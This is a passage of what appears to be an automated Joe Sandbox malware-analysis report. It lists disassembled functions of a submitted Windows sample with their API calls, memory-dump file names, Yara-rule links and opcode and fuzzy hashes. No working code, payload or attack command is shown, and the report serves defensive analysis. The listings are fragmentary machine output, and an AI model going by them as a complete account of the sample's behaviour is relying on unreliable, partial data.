                                                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1946975507-0
                                                                                                                                                  • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                                                                                  • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                                                                                                                  • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                                                                                  • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                                                                                                                  Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0045871B
                                                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3974789173-0
                                                                                                                                                  • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                                                                                  • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                                                                                                                  • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                                                                                  • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                                                                                                                  Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: %I
                                                                                                                                                  • API String ID: 0-63094095
                                                                                                                                                  • Opcode ID: bee15131814e39812dc00af0912bda8edef71e582df47ac87d3b6ac4542ede2d
                                                                                                                                                  • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                                                                                                                  • Opcode Fuzzy Hash: bee15131814e39812dc00af0912bda8edef71e582df47ac87d3b6ac4542ede2d
                                                                                                                                                  • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                                                                                                                  Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __itow_s
                                                                                                                                                  • String ID: xbL$xbL
                                                                                                                                                  • API String ID: 3653519197-3351732020
                                                                                                                                                  • Opcode ID: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                                                                                                  • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                                                                                                                  • Opcode Fuzzy Hash: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                                                                                                  • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                                                                                                                  Function 00AAFAF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: pow
                                                                                                                                                  • API String ID: 0-2276729525
                                                                                                                                                  • Opcode ID: 7a29594973d756f24389713ff73510914e374535b864d70a4ce6aa1e99bec0a5
                                                                                                                                                  • Instruction ID: f0afb2654d63f1881da9b358e978d411930ea8af1e1b104ce25fc08d16ec7b74
                                                                                                                                                  • Opcode Fuzzy Hash: 7a29594973d756f24389713ff73510914e374535b864d70a4ce6aa1e99bec0a5
                                                                                                                                                  • Instruction Fuzzy Hash: 8151AD71A081058ECB29BB58DE117FA77B8DB41750F608D3CE8D5432EAEB358CD29B42
                                                                                                                                                  Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • __wcsnicmp.LIBCMT ref: 0046B02D
                                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                  • String ID: LPT
                                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                                  • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                                                                                  • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                                                                                                                  • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                                                                                  • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                                                                                                                  Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00412968
                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                                  • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                                                                                  • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                                                                                                                  • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                                                                                  • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                                                                                                                  Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                  • String ID: DdL$DdL
                                                                                                                                                  • API String ID: 1473721057-91670653
                                                                                                                                                  • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                                                                                  • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                                                                                                                  • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                                                                                  • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                                                                                                                  Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 0047259E
                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                                  • String ID: |
                                                                                                                                                  • API String ID: 1413715105-2343686810
                                                                                                                                                  • Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                                                                                                  • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                                                                                                                  • Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                                                                                                  • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                                                                                                                  Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                                  • String ID: static
                                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                                  • Opcode ID: fe7b429f46a203bc2f62a8eb9eb86c4b0cdb7e8276fc7fa95013594c94c354db
                                                                                                                                                  • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                                                                                                                  • Opcode Fuzzy Hash: fe7b429f46a203bc2f62a8eb9eb86c4b0cdb7e8276fc7fa95013594c94c354db
                                                                                                                                                  • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                                                                                                                  Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00462911
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                                  • Opcode ID: 91418dd9749d71d93997971e50ee6e89b8c3289f57ab89a5a78092f89cf02659
                                                                                                                                                  • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                                                                                                                  • Opcode Fuzzy Hash: 91418dd9749d71d93997971e50ee6e89b8c3289f57ab89a5a78092f89cf02659
                                                                                                                                                  • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                                                                                                                  Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID: Combobox
                                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                                  • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                                                                                  • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                                                                                                                  • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                                                                                  • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                                                                                                                  Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                    • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                    • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                  • String ID: static
                                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                                  • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                                                                                  • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                                                                                                                  • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                                                                                  • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                                                                                                                  Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
